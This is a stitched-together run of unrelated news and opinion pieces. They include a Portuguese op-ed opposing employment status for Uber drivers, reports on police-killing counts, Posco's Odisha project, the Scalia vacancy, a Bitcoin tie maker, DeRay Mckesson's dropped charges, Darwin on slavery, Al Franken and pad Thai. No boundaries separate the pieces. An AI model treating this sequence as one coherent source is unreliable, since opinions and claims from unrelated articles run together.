Todavia , esses mesmos elementos estão presentes , por exemplo , na relação de trabalho dos árbitros de competições esportivas com as federações e confederações a quais são filiados , ou , melhor ainda , entre os motoristas de táxi e os detentores das correspondentes licenças municipais . E por que , então , estes trabalhadores não acionam o Judiciário em busca de reconhecimento da relação empregatícia ? E , quando o fazem , têm seus pedidos rotineiramente indeferidos ?
Frederick Hayke afirmava que “ no conflito entre os vários grupos de pressão não prevalecem , necessariamente , os interesses dos grupos mais pobres e mais numerosos ” . Eis aí o X da questão : como é deveras oneroso manter empregados com carteira assinada no Brasil ( especialmente em função dos encargos , como INSS e FGTS ) , resta aos empregadores buscarem formas de fugir de tais obrigações , apelando , claro , para os legisladores . E enquanto determinados “ grupos de pressão ” logram êxito nesta empreitada , os demais cidadãos precisam arcar com o peso destes privilégios concedidos aos amigos do Rei .
Vejamos primeiramente a questão dos árbitros : a lei 9.615/1998 , conhecida como “ Lei Pelé ” , prescreve , no parágrafo único do artigo 88 , que “ Independentemente da constituição de sociedade ou entidades , os árbitros e seus auxiliares não terão qualquer vínculo empregatício com as entidades desportivas diretivas onde atuarem , e sua remuneração como autônomos exonera tais entidades de quaisquer outras responsabilidades trabalhistas , securitárias e previdenciárias ” . Pronto : as federações esportivas estão livres das amarras trabalhistas . Observando os escândalos recentes que atingiram a CBF e também outras entidades desportivas , pode-se imaginar que métodos foram utilizados para convencer o Estado a conceder-lhes tal isenção .
Agora analisemos porque os motoristas de táxi não são considerados empregados dos detentores das autorizações municipais . Observe-se este trecho de um julgado do Tribunal Regional do Trabalho do Paraná , proferido em 2011 : “ Taxista que trabalha nos moldes da Lei 6094/71 e cuja forma autônoma de atuar é confirmada pelos elementos de prova colhidos , não pode ser declarado empregado nos moldes do artigo 3º da CLT . Incidência do princípio da primazia da realidade , que impede o reconhecimento de vínculo empregatício a trabalhador que não se encontra juridicamente subordinado ao dono do carro , apenas trabalhando em regime de colaboração com este , tal como previsto na citada Lei que regulamenta a atividade e que inclusive define , de forma expressa , o caráter autônomo de situações como a dos autos ” . Pois é : a referida lei concede aos proprietários de licenças de táxi esta salvaguarda contra a CLT , garantindo-lhes uma espécie de imunidade contra ações judiciais . E o círculo de amigos do Rei vai aumentando – assim como a parcela de riqueza sugada do restante da sociedade para manter estes amigos contentes .
Resta saber se o Uber também logrará conseguir um tratamento diferenciado dos demais empregadores , mas não parece ser esta a tendência . Ao contrário , os taxistas tem levado vantagem nesta queda de braço em diversas cidades do Brasil , onde o Uber já foi regulamentado , como em São Paulo . Como resultado , temos o encarecimento do serviço , por óbvio , e um malefício ainda pior é gerado : dinheiro que circulava na mão dos cidadãos é canalizado para órgãos públicos , notadamente mais ineficientes ( e desonestos ) que os investidores da esfera privada . É a questão do custo de oportunidade : se os consumidores seguissem pagando menos pelo transporte urbano , tal qual estava ocorrendo antes da regulamentação , eles iriam gastar estes recursos economizados ( ou mesmo poupá-los , aumentando a oferta de crédito e contribuindo para a redução das taxas de juros ) em outros produtos e serviços , girando a roda da economia de forma muito mais eficaz . Como diria Bastiat : o que se vê , após a regulamentação , são taxistas sorridentes ( mas nem tanto , vez que eles ansiavam por mais privilégios ) ; o que não se vê é o empobrecimento geral que tal medida causa – e que gera , inclusive , desemprego .
Digamos , então , que o Uber seja obrigado a assinar a carteira de todos os seus motoristas . Isso vai representar , necessariamente , uma melhoria em suas vidas ? Contar-lhes-ei uma história que ouvi de um amigo , ano passado :
“ Meu irmão , que é engenheiro , estava sendo contratado por uma grande empresa canadense . O diretor que o entrevistava apresentou a proposta de emprego : “ O senhor vai ter 20 dias de férias e feriados ( isso mesmo , os feriados são deduzidos das férias ! ) , stock options , salário de 90 mil dólares canadenses por ano… ” Nisso , meu irmão gentilmente o interrompeu : “ Senhor , desculpe-me , mas minha família reside no Brasil e eu gostaria de ter 30 dias por ano de descanso… ” Impassível , o diretor fez algumas contas rapidamente e emendou : “ OK , o senhor terá 30 dias de férias e feriados , salário de CAD 87 mil por ano… ”
Moral da história : do couro sai a correia . Qualquer empresa possui uma determinada capacidade financeira com a qual pode remunerar seus empregados , e tanto faz se o fará por meio de dezenas de verbas trabalhistas criadas por governantes populistas ou se , simplesmente , vai entregar tudo na mão do empregado como salário . Quando o trabalhador vai até o mercado fazer compras , o comerciante não quer saber se o pagamento saiu do 13º , das férias , das horas extras ; ele só quer ouvir o “ tin-tin ” na máquina registradora . E assim deveria também pensar o brasileiro .
Ou seja , se o Uber for obrigado a contratar como motoristas todos os cadastrados , e passar a cumprir todas as imposições legais próprias , certamente precisará dispensar uma grande parcela destes profissionais – isso se suas atividades não forem inviabilizadas por completo . Direitos trabalhistas são altamente custosos para a produção e roubam nossa competitividade . E sem competitividade , não há emprego . Em suma , as infindáveis lutas por melhorias no meio sindical são , na verdade , um tiro no pé . Se a empresa não pode negociar reduções , demite . E não será diferente desta vez .
Mas como melhorar então o rendimento dos motoristas autônomos que fazem uso de aplicativos para conectar-se a seus clientes ? Ora , basta o Estado brasileiro parar de embarreirar a entrada destes aplicativos no mercado . Diversas outras iniciativas do gênero tem surgido no Brasil , e todas essas empresas precisarão disputar a mão de obra dos motoristas – o que irá levar , inevitavelmente , à elevação dos ganhos destes . A demanda por esta mão de obra aumenta em relação à oferta , aumentando , naturalmente , o preço do trabalho ( o bom e velho salário ) . Não percamos de vista que os motoristas podem , inclusive , ficar cadastrados em mais de um aplicativo , e , como não há jornada de trabalho estipulada , trabalharem mais horas para aquele que lhe oferecer mais benefícios – o que pode variar com o tempo , em virtude da disputa entre os aplicativos e do decorrente oferecimento de estímulos . Nada os impede de colocarem o Uber no off e ficarem atendendo as chamadas do WillGo , se assim lhes for mais oportuno ; ou vice-versa .
Conheço pessoas que trabalham como motoristas do Uber . Algumas complementam a renda familiar dirigindo por algumas horas diárias . Outras sustentam a família com esta atividade porque perderam o emprego após o estouro da bolha financeira gerada pelo PT e suas pedalas fiscais “ desenvolvimentistas ” . E o mais curioso : há aquelas que costumavam ser motoristas de táxi e preferiram migrar para o Uber . Sinal de que a coisa não é tão ruim quanto parece . Eu não ficaria surpreso , inclusive , se vier à tona que tais pessoas que pleiteiam ingressar com medidas judiciais contra o aplicativo de transporte fossem apenas “ laranjas ” infiltrados pelas máfias do táxi , a fim de complicar a vida da concorrência . Livre mercado , afinal , é interesse da sociedade , e não de malandros que adoram uma reserva de mercado .
E ainda que não seja este o caso , e que haja , sim , muitos insatisfeitos , acredito que assim o seja devido à mentalidade paternalista da maior parte de nossa população . Seria mais vantajoso para todos ( motoristas , Uber e usuários ) que estes passassem a ver a si próprios como franqueados – e , como tais , podem obter maiores lucros se prestarem melhores serviços , ou podem ser descredenciados se não cumprirem as normas do franqueador . Pergunte no MC Donald 's mais próximo se assim não é a vida do proprietário .
Encerro a argumentação lançando mão , uma vez mais , da obra de Frederick Hayke , sob medida para este imbróglio :
“ Enquanto , num país , o movimento socialista estiver intimamente ligado aos interesses de um grupo particular , em geral constituído pelo operariado das categorias mais especializadas , será bastante simples criar uma opinião comum quanto ao status desejável dos diferentes membros da sociedade . A primeira preocupação do movimento será elevar o status de um grupo acima do dos outros grupos . O problema , todavia , muda de caráter à medida que , na marcha progressiva para o socialismo , evidencia-se para o indivíduo que sua renda , e de um modo geral sua posição , são determinadas pelo mecanismo coercitivo do estado e que ele só pode manter ou melhorar essa posição como membro de um grupo organizado capaz de influenciar ou controlar a máquina estatal ” .
Sobre o autor : Atua como Auditor-Fiscal do Trabalho , e no exercício da profissão constatou que , ao contrário do que poderia imaginar o senso comum , os verdadeiros exploradores da população humilde NÃO são os empreendedores . Formado na Escola de Especialistas de Aeronáutica ( EEAR ) como Profissional do Tráfego Aéreo e Bacharel em Letras Português/Inglês pela UFPR . Também publica artigos em seu site : https : //bordinburke . wordpress.com/
Spread the love
To date the most reliable data anyone has about law enforcement killings in the U.S. was the FBI 's statistics on homicides by law enforcement . But therein lies the problem .
Those numbers are voluntarily given to the FBI by police , and many jurisdictions simply do n't hand over this information , thus making an accurate accounting of exactly how many people police have actually killed each year extremely difficult to ascertain .
For instance , the killing of Eric Garner would not be included in the FBI 's 2014 statistics because New York does n't participate in the voluntary program .
Thankfully there is a new means of aggregating how many people are being killed by law enforcement . This new tool for accountability is the website www.killedbypolice.com .
It 's basically a spreadsheet that lists every person killed by cops in the years 2013 and 2014 . In addition to naming those killed , it also provides a link to media reports for each of the killings , age , sex and race if available .
The information available on the site begins in May of 2013 and runs through now . The novel idea of monitoring the number of police killings through news reports has shown to be a much better accounting of deaths at the hands of cops than the voluntary FBI system .
The FBI 's stats show that in all of 2013 there were 461 people killed by cops , but when using the new site , which only shows from May 1 to Dec. 31 , 2013 , police actually killed 748 people . Keep in mind , 748 is drastically more than the feds claim police killed the entire year but only accounts for 8 months of 2013 .
The site shows 2014 's total number killed by police to be at 1,029 with a few weeks left in the year .
Here is a link to their Facebook page . This is another wonderful tool to be utilized in holding law enforcement accountable for their actions , as they can no longer hide these numbers from the public .
This site has shown itself to be a dramatically better barometer for what is actually transpiring in police state USA , and accounting for how many citizens are actually being killed by police , than anything we previously had available .
Jay Syrmopoulos is an investigative journalist , freethinker , researcher , and ardent opponent of authoritarianism . He is currently a graduate student at University of Denver pursuing a masters in Global Affairs . Jay 's work has previously been published on BenSwann.com and WeAreChange.org . You can follow him on Twitter @ sirmetropolis , on Facebook at Sir Metropolis and now on tsu .
South Korean steelmaker Posco has suspended the $ 12-billion project it had agreed to set up in Odisha a decade ago . There are also indications that the company may altogether scrap the project , following the delays in getting ore mining lease and required land .
The 2005 project to set up a steel plant was billed as India 's biggest foreign direct investment at that time but it has encountered a series of delays . The company waited about a decade to acquire land for the proposed 12-million-tonnes-a-year steel plant , owing to opposition from local tribal groups . The new mining bill that rendered sourcing of iron ore costlier for the project seems to the immediate reason for the suspension .
As per the mining law enacted in March , the company will now also have to buy a mining licence in an auction . Initially , the Odisha government had promised to help the company secure the licence for free .
The new law could raise costs for the company at a time when a global steel glut is depressing prices . `` We will have to see how our costs will be , whether it will be viable , '' Posco 's India spokesman , I G Lee , was quoted as saying in a Reuters report . `` We will take a final call only after the auction details are out . ''
Asked whether the company could skip the auction and withdraw from the Odisha project , Lee said : `` Yes . ''
However , a PTI report said Posco has put the project on hold in Odisha due to delays in various regulatory approvals .
“ We are tentatively suspending the Odisha ( India ) project due to lack of any progress , ” Posco Chairman and CEO Kwon Oh Joon was quoted as saying in the report .
“ Business conditions at home and abroad have changed due to drop in global steel demand , growing deficit of subsidiaries , which have led us to come to a conclusion that we must step up our reform efforts , ” he said at an investor event in Seoul on Thursday .
According to a Bloomberg report the company chief also said until `` Indian Prime Minister Narendra Modi “ offers better deals , we wo n't resume and for now we will head to the west and do more downstream work , ” he said , referring to a plant the company operates in the state of Maharashtra '' .
In the PTI report , an unnamed company company spokesperson , however , has denied that it was pulling out of the Odisha project .
“ That is not the fact . Due to no progress in the project area , much of office space was lying vacant in Odisha . It was decided to renovate the office space to a smaller area , ” the spokesperson has been quoted as saying .
Through the past two years , Posco and ArcelorMittal , the world 's largest steelmaker , have scrapped a number of other projects in India , citing difficulties in acquiring land and mines . Another withdrawal by Posco could dent Prime Minister Narendra Modi 's 'Make in India ' manufacturing push .
Odisha mines minister Prafulla Kumar Mallik , meanwhile , told Reuters that his government remained keen to help Posco but had not heard from the company . `` We had requested the central government for a concession for Posco but the Centre wanted to go for an auction , '' he said . `` Now , it is for Posco to decide if they want to participate in the auction . ''
Narendra Singh Tomar , Union steel and mines minister , has repeatedly ruled out making an exception for Posco .
Since the mining law was announced in March , Posco has cut a number of jobs in Odisha , given up real estate and not rebuilt temporary site offices that were burned down by people protesting against land acquisition by the company .
`` We downsized in April because there was no work , '' Lee said .
Instead , the company is importing steel from South Korea for its expanding network of processing centres in India . It would raise its processing capacity by about a fifth to 680,000 tonnes through a new plant in Gujarat next year , Lee said .
With inputs from agencies
Firstpost is now on WhatsApp . For the latest analysis , commentary and news updates , sign up for our WhatsApp services . Just go to Firstpost.com/Whatsapp and hit the Subscribe button .
By Rachel Stoltzfoos , DCNF
Senate Majority Leader Mitch McConnell 's decision to block President Barack Obama from replacing Justice Antonin Scalia on the Supreme Court devastated Obama 's immigration legacy in June , but it looks even more impressive following Donald Trump 's win in the presidential election Tuesday .
When news broke that Scalia had died unexpectedly Feb. 13 , McConnell stunned the White House by almost immediately releasing a statement declaring the Senate would block any Obama nominee to replace him on the bench .
“ The American people should have a voice in the selection of their next Supreme Court Justice , ” McConnell said in a statement less than an hour after the news of Scalia 's death broke . “ Therefore , this vacancy should not be filled until we have a new President . ”
His quick decision set the tone for Senate Republicans who may have otherwise wavered in their response , and provided cover for the possibility of attacks from Democrats on the motivations for his decision to block a particular nominee .
“ It was a real shocker , ” a senior White House official later told Politico .
Soon after McConnell 's statement , Obama announced his intention to nominate a replacement . Senate Democrats launched an ongoing effort to pressure Republicans into backing down from McConnell 's decision , arguing the Senate is duty-bound to get a replacement on the bench .
“ It would be unprecedented in recent history for the Supreme Court to go a year with a vacant seat , ” Senate Minority Leader Harry Reid said in a statement . “ Failing to fill this vacancy would be a shameful abdication of one of the Senate 's most essential Constitutional responsibilities . ”
Senate Republicans did not budge , and it looks like McConnell 's decision to take the lead rather than feel out his caucus after Scalia 's death played a key role in the outcome of the Supreme Court 's deadlocked decision on Obama 's immigration executive order in June .
Had Obama 's nominee Merrick Garland been sitting on the court , the ruling almost certainly would have been a five to four vote upholding the executive order . Instead , the four to four tie means the lower court 's ruling stands , and he could not move forward with his plan to grant legal status and work permits to millions of illegal immigrants .
That left Obama with no way to come through for the 4 million plus illegal immigrants he wanted to grant amnesty , and puts any chance of comprehensive immigration reform the way he sees it on the outcome of the 2016 election . If former Secretary of State Hillary Clinton had won and the Democrats took back the House and Senate , that would have been a real possibility , but Obama 's involvement would have been negligible .
“ That [ immigration reform ] is obviously not going to happen during the remainder of this Congress , ” Obama acknowledged in his response . “ We do n't have a Congress that agrees with us on this . ”
“ This is part of the consequence of the Republican failure so far to give a fair hearing to Mr. Merrick Garland , my nominee to the Supreme Court , ” he said . “ It means that the expanded set of common-sense deferred action policies — the ones that I announced two years ago — ca n't go forward at this stage , until there is a ninth justice on the Court to break the tie . ”
McConnell spokesman Don Stewart told The Daily Caller News Foundation the president was “ telling ” in his remarks and reiterated the majority leader 's position that Scalia 's replacement should not be decided until after the 2016 election .
“ The president was pretty clear in his remarks yesterday that he was disappointed he did n't get his own justice , because if he had he would have won in that case , ” he told TheDCNF . “ You 're not supposed to put somebody on there to rule the way you want them to . ”
“ The leader [ McConnell ] was clear from the beginning that the next president will be making this nomination after the people have had a chance to speak , ” he added .
Rather than confirm a moderate to left-leaning judge appointed by Obama , Senate Republicans will now have the opportunity to confirm at least one justice to the Supreme Court nominated by Trump .
Editor 's note : An earlier version of this story appeared in June . It has been updated to reflect Donald Trump 's win in the presidential election .
Follow Rachel on Twitter
Content created by The Daily Caller News Foundation is available without charge to any eligible news publisher that can provide a large audience . For licensing opportunities of our original content , please contact [ email protected ] .
What 's the classiest way to communicate your passion for cryptocurrency ? How about a subtle & stylish Bitcoin tie ?
Recently , Cyberoptix Tie Lab announced that all of their products would be available for purchase with Bitcoin – including ties with a new cryptocurrency-inspired pattern .
Since 2005 , Cyberoptix Tie Lab has been bringing unique designs to neckties and allowing for an enormous amount of customization . Looking for a gift for that guy who loves baseball ? They 've got it , and they have one for the football fan too . Or maybe archery ? Their designs are organized by theme , and with options like Circuit Boards , Aviation , Weaponry , and Architecture , there 's sure to be a tie for everyone . The Lab offers an incredible amount of color combination options ( over 100 fabric colors & over 100 printing ink colors ) , and they make all of the ties by hand in their large Detroit studio .
Some of our favorite days are spent in dusty museum cabinets of curiosities , junk shops and estate sales to find obscure bits of inspiration that we 'll re-draw in the tie shape .
It 's hard to choose a favorite out of the wide variety of designs offered , but Bethany Shorb , the founder & owner , says that the Bitcoin pattern is hers : “ I enjoy twisting traditional repeating pattern motifs , ones that look like a traditional necktie designs but have a little nerdy/enthusiast something extra hidden within the pattern . You might not realize that extra bit is there until you see it up close or have pre-existing knowledge of what it is . ”
Emily Braun : How did you hear about Bitcoin ? What were your first impressions of it ?
Bethany Shorb : I think I heard about it around four years ago ; I knew it was a thing – and a thing that I should really know more about , especially since I accept payments for things ! At the time , we had this really crappy , old school , hand-coded website with 250 pages and absolutely no content management system or merchant account . It was only backended by Paypal , so I had no idea how to integrate Bitcoin acceptance into my cart . Basically , we grew stupid fast , and I was set up for managing ten products , not thinking it was going to go anywhere…typical growing pains stuff . So yeah , it was something I wanted to be on top of early , but I did n't have the chops to implement it as early as I had wanted .
Braun : What made you decide to accept Bitcoin ? How is it beneficial to a business to accept Bitcoin ?
Shorb : Simply , customers kept asking to pay by Bitcoin , so we felt we had to . It 's important to give customers what they want , need , and ask for . If a few people are taking the time to ask me about it each month , how many people are keeping quiet and not bothering to reach out ? Lots ! Probably ten times that , at least . We also heavily cater to a geek and enthusiast market , and I have a feeling there is a lot of crossover with our product themes and those who are into Bitcoin and the blockchain .
Finally , this year we got our online shop on a real CMS ( Shopify ) , which is really easy to integrate checkout with either Coinbase or Bitpay . If you choose to instantly convert to USD , I see the simple acceptance layer as no different than accepting Canadian Dollars , Euros , or Pounds . We operate in a global web-space , and it seems silly not to accept payment in all currency formats that our customers prefer .
Although I would have liked to have been accepting Bitcoin earlier , I think we 're still reasonably early adopters , at least in the independent maker online market . Being early adopters has served us really well , having had an online shop before Etsy existed and having our shop open on Etsy 's marketplace during their inaugural year in 2006 . It 's still thriving there today . I do n't think we 'd be where we are now had we not gotten our foot in the door early on in e-commerce . I do n't want to get left behind with Bitcoin either .
Braun : In general , what are some of the ways that you think Bitcoin could bring about positive changes ?
Shorb : I am really looking forward to Bitcoin facilitating cross-border electronic payments , because the current system is insufferable and outdated . From a manufacturing and global trade standpoint , I was buying some equipment overseas last month , and my stupid Western Union payment failed , causing over a month delay in getting a really vital piece of machinery for our product-line expansion . Adding insult to injury , that $ 3K for a heat press was then held up for weeks in back-and-forth banking limbo . That would n't happen with Bitcoin .
Braun : Have you ever purchased something with Bitcoin ? And if not , why not ?
Shorb : I sure want to , but few ( if any ) places that I buy equipment and supplies from accept it as a form of payment . Fabric , art supply , and industrial equipment manufacturers have been a little slow on the adoption front , and I really do n't buy much else . Right now , I 'm stashing what I have and taking the long view .
Braun : Where do you see the future of Bitcoin heading ?
Shorb : Last week , I returned from Summit at Sea 2015 and was fortunate to attend a number of brain-breaking , mind-expanding talks about Bitcoin , led by forward-thinking industry elites such as Brian Forde , Brock Pierce , Jalak Jobanputra , and the Winklevoss brothers . I learned more in a couple hours of talks than I can even adequately explain . As a part-time DJ I look forward to DRM being attached to blockchain . Playing out at 2am after recently getting a new computer ( how criminal ) and then discovering that a favorite track you bought & legally own wo n't play because it 's authorized on too many of your devices already is the absolute worst . Decriminalizing and adding a privacy layer to your own purchases is a great start , as is the idea of micropayments to facilitate the compensation of content creation .
Braun : Why is it important to you & your customers that all ties are made by hand ?
Shorb : We print everything to order so that we can keep costs down for our customers ( we do n't have any printed inventory sitting around – that gets expensive ) . Printing to order also allows for infinite customizations . People really appreciate being able to have personalized pieces , even if it is as simple as a crazy color combination . Want our Hops and Wheat print on purple and chartreuse ? Get on with your bad self .
For only $ 5 more , you can build a necktie , bow tie , pocket square , or scarf in the perfect color and design combination that is unique to your style , the event you 're planning , or the organization you belong to . You can choose from over 100 fabric colors , over 100 printing ink colors , six tie sizes , countless fabric choices , and over 275 graphics .
You ca n't walk into a mall or department store and get that level of personalized , bespoke service , even from the most upscale retailer . Where can you walk in and say “ I want that pattern , but in chartreuse and eggplant , but in a slim tie , and I need it in two days . Oh and I need 10 of them. ” We can do that .
Braun : I love all of the ways that Cyberoptix is involved with the community , including your partnership with Grow Detroit 's Young Talent . Why is community involvement important for a company ?
Shorb : We 're proud to have been in business in Detroit for nearly a decade , and we want to give back to the community that has supported our growth . I have n't really had many mentors in my life , and I feel I could have gotten a lot further a lot faster and made a lot fewer mistakes had I had that kind of guidance . I guess I hope we can be that person or place to someone in need ? We want to share what we can through assisting charitable organizations with in-kind donations , a facility to help boost student internship programs , youth mentoring support , and other creative ways to help make ties with our community .
By assisting young people in the city with gaining a quality work experience and inspiring their own entrepreneurship skills , hopefully they 'll translate what they 've learned here and in time , create jobs for others in the future . As budgets for art education diminish , we want to demonstrate to young adults that there still are many possibilities for fruitful careers in the arts , especially when combined with technology .
Braun : Your studio cat is so cute ! What does he think about Bitcoin ?
Shorb : He loves it ; he 's stashing coins away hoping to find a site that accepts it for catnip . Once he does , he 's going to log on and drain my account , and I wo n't know until I see a bale of it on my doorstep , and he 's salivating with saucer eyes .
– Emily Braun
To explore all of the designs offered by Cyberoptix Tie Lab , click here !
Prosecutors in Louisiana have dropped charges against DeRay Mckesson , the civil rights activist and Baltimore schools administrator who was among more than 100 arrested in Baton Rouge while protesting police brutality earlier this month .
District Attorney Hillar C. Moore III of East Baton Rouge announced Friday that the office would n't prosecute about 100 cases involving protesters charged with obstruction of a roadway or public passage . Roy Rodney Jr. , Mckesson 's attorney in Louisiana , confirmed Monday that Mckesson was among those 100 .
Mckesson , a prominent activist who was named chief of human capital for Baltimore public schools last month , was arrested on one count of obstruction of a highway , which is a misdemeanor , as he was walking along Baton Rouge 's Airline Highway . Mckesson founded and leads We the Protesters , a group that advocates policy changes to stem police violence .
The East Baton Rouge District Attorney 's office could not be reached for comment .
`` It is clear that the District Attorney understood that the arrest was unlawful and dropped the charges accordingly , '' said Mckesson , who finished sixth in Baltimore 's Democratic mayoral primary this spring .
Pictures of civil rights activist DeRay Mckesson , who finished sixth in the Democratic primary for Baltimore mayor in 2016 .
`` This is exactly the relief we had requested from the district attorney and the relief we had expected , '' Rodney said . `` So I 'm glad to see that the DA conducted a rational review of the facts of this case , because Mr. Mckesson had done nothing wrong . He has not violated the law , nor had he disobeyed any police officers . ''
cwells @ baltsun.com
[ In the following passage from near the end of The Voyage Of The Beagle , Darwin speaks from personal experience of the horrors of slavery . — George P . Landow . ]
I must here commemorate what happened for the first time during our nearly five years ' wandering , namely , having met with a want of politeness ; I was refused in a sullen manner at two different houses , and obtained with difficulty from a third , permission to pass through their gardens to an uncultivated hill , for the purpose of viewing the country . I feel glad that this happened in the land of the Brazilians , for I bear them no good will -- a land also of slavery , and therefore of moral debasement . [ 521 ]
On the 19th of August we finally left the shores of Brazil . I thank God , I shall never again visit a slave-country . To this day , if I hear a distant scream , it recalls with painful vividness my feelings , when passing a house near Pernambuco , I heard the most pitiable moans , and could not but suspect that some poor slave was being tortured , yet knew that I was as powerless as a child even to remonstrate . I suspected that these moans were from a tortured slave , for I was told that this was the case in another instance . Near Rio de Janeiro I lived opposite to an old lady , who kept screws to crush the fingers of her female slaves . I have stayed in a house where a young household mulatto , daily and hourly , was reviled , beaten , and persecuted enough to break the spirit of the lowest animal . I have seen a little boy , six or seven years old , struck thrice with a horse-whip ( before I could interfere ) on his naked head , for having handed me a glass of water not quite clean ; I saw his father tremble at a mere glance from his master 's eye . These latter cruelties were witnessed by me in a Spanish colony , in which it has always been said that slaves are better treated than by the Portuguese , English , or other European nations . I have seen at Rio de Janeiro a powerful negro afraid to ward off a blow directed , as he thought , at his face . I was present when a kind-hearted man was on the point of separating forever the men , women , and little children of a large number of families who had long lived together . I will not even allude to the many heart-sickening atrocities which I authentically heard of ; -- nor would I have mentioned the above revolting details , had I not met with several people , so blinded by the constitutional gaiety of the negro as to speak of slavery as a tolerable evil . Such people have generally visited at the houses of the upper classes , where the domestic slaves are usually well treated , and they have not , like myself , lived amongst the lower classes . Such inquirers will ask slaves about their condition ; they forget that the slave must indeed be dull who does not calculate on the chance of his answer reaching his master 's ears .
It is argued that self-interest will prevent excessive cruelty ; as if self-interest protected our domestic animals , which are far less likely than degraded slaves to stir up the rage of their savage masters . It is an argument long since protested against with noble feeling , and strikingly exemplified , by the ever-illustrious Humboldt . It is often attempted to palliate slavery by comparing the state of slaves with our poorer countrymen : if the misery of our poor be caused not by the laws of nature , but by our institutions , great is our sin ; but how this bears on slavery , I can not see ; as well might the use of the thumb-screw be defended in one land , by showing that men in another land suffered from some dreadful disease . Those who look tenderly at the slave owner , and with a cold heart at the slave , never seem to put themselves into the position of the latter ; -- what a cheerless prospect , with not even a hope of change ! picture to yourself the chance , ever hanging over you , of your wife and your little children -- those objects which nature urges even the slave to call his own -- being torn from you and sold like beasts to the first bidder ! And these deeds are done and palliated by men who profess to love their neighbours as themselves , who believe in God , and pray that His Will be done on earth ! It makes one 's blood boil , yet heart tremble , to think that we Englishmen and our American descendants , with their boastful cry of liberty , have been and are so guilty ; but it is a consolation to reflect , that we at least have made a greater sacrifice than ever made by any nation , to expiate our sin .
Darwin wishes for a slave uprising
The following passage , which appears in Life and Letters comes from a letter to Catherine , Darwin 's sister , written in June 1833 .
I have watched how steadily the general feeling , as shown at elections , has been rising against Slavery . What a proud thing for England if she is the first European nation which utterly abolishes it ! I was told before leaving England that after living in slave countries all my opinions would be altered ; the only alteration I am aware of is forming a much higher estimate of the negro character . It is impossible to see a negro and not feel kindly towards him ; such cheerful , open , honest expressions and such fine muscular bodies . I never saw any of the diminutive Portuguese , with their murderous countenances , without almost wishing for Brazil to follow the example of Hayti ; and , considering the enormous healthy-looking black population , it will be wonderful if , at some future day , it does not take place .
Related Material
Bibliography
Darwin , Charles . A Naturalist 's Voyage Round the World : The Voyage Of The Beagle . Project Gutenberg EBook # 3704 produced by Sue Asscher . August 6 , 2008 . The e-version is based on the 1890 11th edition . ( The book first appeared in 1839 . )
The Life and Letters of Charles Darwin . Volume I. Ed . Francis Darwin . Project Gutenberg EBook # 2087 produced by Sue Asscher in February 1999 .
Victorian
Web
Science
Biology
Charles
Darwin
Political
History
Rep. Seth Moulton Seth Wilbur MoultonDem lawmaker : 'Trump 's presidency is the real national emergency ' The Hill 's Morning Report - Presented by the American Academy of HIV Medicine - All eyes on Trump after lawmakers reach spending deal Overnight Defense : Acting Pentagon chief visits Afghanistan | US , Taliban peace talks intensify | Trump tweets in Persian to send message to Iran | Defense world pays tribute to Walter Jones MORE ( D-Mass . ) on Tuesday said Sen. Al Franken Alan ( Al ) Stuart FrankenVirginia can be better than this Harris off to the best start among Dems in race , say strategists , donors Virginia scandals pit Democrats against themselves and their message MORE ( D-Minn. ) should resign following allegations the senator groped women without their consent .
“ From what I know , he should resign . And there will be more of these cases , and we want to make sure that the women feel supported and come forward , ” Moulton said on “ Meet the Press Daily . ”
`` We ought to be setting the tone for the country for how women who do n't have famous bosses who are not at big news organizations or in politics or in the movie industry can come forward with these issues as well , ” he added .
ADVERTISEMENT
A Los Angeles radio host last month said Franken kissed and groped her without her consent during a USO tour in 2006 . Other women have since come forward to allege Franken touched them inappropriately during photos ops .
Franken has apologized and agreed to cooperate with a Senate Ethics Committee investigation , but has said he has no plans to resign .
“ Again , it 's going to take a long time for me to regain people 's trust , but I hope that starting work today that I can start to do that , ” Franken said in a recent press conference .
Moulton on Tuesday was also critical of House Minority Leader Nancy Pelosi Nancy Patricia D'Alesandro PelosiHouse to push back at Trump on border Governors bullish on infrastructure after Trump talks Pelosi attends signing of New York 's new 'red flag ' gun control bill MORE 's ( D-Calif. ) initial response to allegations of sexual misconduct against former Rep. John Conyers John James ConyersDemocrats seek cosponsors for new 'Medicare for all ' bill Virginia scandals pit Democrats against themselves and their message Women 's March plans 'Medicare for All ' day of lobbying in DC MORE Jr. ( D-Mich . )
After multiple women accused Conyers of making unwanted sexual advances , Pelosi said the congressman deserved due process , and called him an “ icon . ”
Multiple other women have come forward since alleging inappropriate behavior by Conyers , and Pelosi eventually called for his resignation .
Conyers resigned Tuesday “ effective immediately . ”
A Drummondville couple has won its case to grow vegetables in their front yard .
City council decided Monday night that Josee and Michel Landry can keep their garden .
Neighbours complained to the city after the Landrys ripped out their lawn in the spring and replaced it with zucchinis , green beans and tomatoes in an effort to start eating better , and chose the front yard because the backyard gets no sun .
A municipal by-law says one third of a front yard must be hedges or grass .
The city sent the couple a letter , threatening fines if they refuse to restore what the city considers to be acceptable green space – but the couple refused to budge .
The city of Drummondville has now backed off , and will spend the next few months redrafting its bylaw .
But pad Thai was n't just about unity ; it was also about nutrition . The late 1930s were a particularly difficult time economically for the country , and rice noodles , which were both cheap and filling , provided a much-needed antidote . Couple that with vegetables , bean sprouts , and inexpensive protein , and it was the perfect , nutritious meal . “ [ Phibun 's ] series of decrees from 1939–1942 suggested what could be done to strengthen the Thai economy , to instill national image and pride—and to improve the national diet . Popularizing a noodle dish was one means to that end , ” Esterik wrote . Phibun 's government not only disseminated the recipe for pad Thai , but encouraged street vendors to make and sell it throughout the country .
“ It may be the original fast food in Thailand , ” Nitya Pibulsonggram , Thailand 's former ambassador to the United States and former minister of foreign affairs , told Gastronomica in 2009 .
What 's most fascinating about pad Thai , however , is that it probably is n't even Thai . Noodles , stir-fry , and , especially , noodle stir-fries are quintessentially Chinese . In fact , just about every ingredient found in pad Thai is n't native to the people after whom the dish is named . “ The only really Thai ingredient is the pounded dried chillies , ” the Bangkok Post admitted in February . Even the dish 's full name , kway teow pad Thai nods to its Chinese origins ( kway teow is Chinese for rice noodles ) . “ Its name literally means ‘ Thai-style stir-fried noodles , ' and for a dish to be so named in its own country clearly suggests an origin that is n't Thai , ” local chef Kasma Loha-unchit notes in her own recipe . Indeed , the Thai seem to agree—in Thailand , it 's explicitly referred to as a Chinese noodle dish .
There were some 11,600 Thai restaurants worldwide in 2007 , many of which have donned the name of Thailand 's most popular noodle dish , according to Gastronomica . Given that pad Thai can now be found in more than 2 million Google entries , it would certainly seem unfit to call it by any other name . But it would n't necessarily be wrong , either .
We want to hear what you think about this article . Submit a letter to the editor or write to letters @ theatlantic.com .
